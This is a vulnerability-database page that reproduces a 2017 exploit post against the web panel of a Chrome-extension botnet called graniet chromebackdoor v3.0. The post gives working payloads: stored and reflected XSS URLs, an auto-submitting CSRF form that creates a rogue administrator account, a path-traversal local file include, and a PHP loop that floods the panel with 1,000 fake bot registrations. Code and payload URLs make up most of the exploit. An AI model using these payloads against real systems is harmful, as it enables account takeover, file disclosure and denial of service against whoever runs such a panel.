Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Chromebackdoor graniet v3.0 web panel Multi Vulnerability

🗓️ 23 Jan 2017 00:00:00Reported by alqnas eslamType 
zdt
 zdt🔗 0day.today👁 30 Views

Chromebackdoor graniet v3.0 web panel Multi Vulnerability, xss, csrf, local file include, ddo

Code
# Exploit Title: botnet graniet chrome backdoor v3.0 web panel multi vulnerability
# Date: 10-1-2017
# Exploit Author: alqnas eslam
# Vendor Homepage:fb.com/alqnas4
# Software Link:https://github.com/graniet/chromebackdoor
# Tested on:any os


1- cross site scripting

There are many xss vulnerability at graniet chrome backdoor
some of them
stored xss:
POC:
http://localhost/backdoor/web/gate.php?add=<h1>test</h1>&version=<script>alert(/xss/);</script>
this POC add Bots with xss payload so when admin open admin panel the xss code will execute
image of POC:
https://s30.postimg.org/hdngwgxlt/Screenshot_from_2017_01_10_18_27_10.png
image of source code
https://s27.postimg.org/lwk1jwijn/Screenshot_from_2017_01_10_18_44_22.png

reflected xss:
POC:
http://localhost/backdoor/web/index.php?action=info&id=1'></a><script>alert(/xxs/);</script>
image of source code
https://s27.postimg.org/3v0wm3oir/Screenshot_from_2017_01_10_18_45_54.png

2- csrf add user administrator
<body onload="document.alqnas.submit()">
<form action="http://localhost/backdoor/web/index.php?action=settings#" method="post" name="alqnas">
<input type="hidden" name="username" value="admin-hacker" />
<input type="hidden" name="password" value="hacker-pass" />
<input type="hidden" name="role" value="0" />
<input type="hidden" name="add_user" value="Add user" />
</form>
</body>
image of request
https://s27.postimg.org/5j020r2eb/Screenshot_from_2017_01_10_18_43_49.png

3- local file include
http://localhost/backdoor/web/index.php?action=../../relais
image of source code
https://s27.postimg.org/4yl0y295v/Screenshot_from_2017_01_10_18_50_49.png

4- ddos add bots

<?php
function addbots($url)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$output=curl_exec($ch);
curl_close($ch);
}
//1000 are numbers you will send it
$i =1;
while ( $i <=1000){
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
//change localhost to url of bot
addbots("http://localhost/backdoor/web/gate.php?add=$rand&version=$shuf");
$i++;
}
?>

#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Jan 2017 00:00Current
7.1High risk
Vulners AI Score7.1
chromebackdoor graniet v3.0web panelmulti vulnerabilitycross site scriptingstored xssreflected xsscsrfadd user administratorlocal file includeddosvulnerabilityexploitbotnetgranietgithub0day.
30